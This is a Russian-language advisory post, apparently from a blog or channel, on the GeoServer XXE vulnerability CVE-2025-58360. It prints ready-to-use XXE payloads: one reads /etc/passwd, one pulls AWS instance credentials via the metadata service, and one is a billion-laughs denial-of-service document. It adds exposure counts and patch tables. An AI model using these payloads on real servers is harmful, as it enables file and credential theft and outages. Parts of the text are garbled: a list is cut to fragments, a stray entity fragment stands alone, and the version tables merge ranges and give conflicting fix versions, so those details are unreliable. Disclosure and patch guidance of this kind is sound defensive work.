
CVE-2025-58360

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:LЭто классическая, но разрушительная XXE в эндпоинте GetMap службы Web Map Service (WMS).
Атакующие могут:
/etc/passwd, geoserver.xml, приватные ключи и т. д.)→ Это десятки тысяч потенциально уязвимых серверов, которые прямо сейчас находятся в открытом интернете! 🌐
Эндпоинт: POST /geoserver/wms
Ключевой параметр: SLD_BODY (позволяет передавать необработанный XML-код стилей)
Уязвимый участок кода: парсер XML не отключает разрешение внешних сущностей → классическая XXE.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
<sld:UserLayer>
<sld:LayerFeatureConstraints>
<sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
</sld:LayerFeatureConstraints>
</sld:UserLayer>
</sld:StyledLayerDescriptor>
→ Ответ содержит содержимое /etc/passwd 🎉
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
→ Приводит к утечке временных учётных данных AWS при работе на EC2.
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!-- repeat up to lol9 -->
]>
<lol>&lol9;</lol>
→ За секунды расходует гигабайты оперативной памяти 💥
| Версия | Дата выпуска | Ссылка для загрузки |
|---|---|---|
| 2.27.0 | 25 ноября 2025 | https://geoserver.org/release/stable/ |
Пользователи Docker:
docker pull osgeo/geoserver:2.27.0
<!ENTITY или SYSTEM "file://| Дата | Событие |
|---|---|
| До ноября 2025 | Обнаружено автономно ИИ-сканером XBOW |
| 25 ноября 2025 | Скоординированное раскрытие → выпущены исправления |
| 25 ноября 2025 | CVE присвоен и опубликован |
| 26 ноября 2025 | PoC становятся вирусными, сканирование подверженности резко возрастает |
Это классическая XXE, поражающая широко развёрнутую геопространственную платформу с десятками тысяч экземпляров, доступных из интернета.
Исправления вышли в тот же день, что и раскрытие, — огромный респект команде GeoServer за скорость! 🏆
Но окно между выпуском исправления и массовой эксплуатацией стремительно сокращается.
Если вы используете GeoServer → обновитесь сегодня.
Не становитесь следующей новостью.
Оставайтесь в безопасности, оставайтесь на высоте! 🛡️✨
| Компонент | Уязвимые версии | Исправлено в | Статус |
|---|
| GeoServer Standalone | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.3, 2.25.6, 2.27.0 | 🔴 Уязвим |
| Docker (osgeo/geoserver) | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.27.0 | 🔴 Уязвим |
| Maven org.geoserver:gs-wms | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 Уязвим |
| Maven org.geoserver.web:gs-web-app | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 Уязвим |
| GeoServer 2.27.x и новее | – | Уже исправлено | ✅ Безопасно |
| Источник | Открытые экземпляры | Примечания |
|---|
| ZoomEye | ~49,400 | поиск app:"GeoServer" |
| FOFA | ~24,000 | Результаты за последний год |
| Shodan | ~31,000 | Порт 8080 + совпадение по заголовку |
| GobySec | ~20,000 | Сканирование публичной сети |
| 2.26.3 | 25 ноября 2025 | Исправление ветки сопровождения |
| 2.25.6 | 25 ноября 2025 | Более старая поддерживаемая ветка |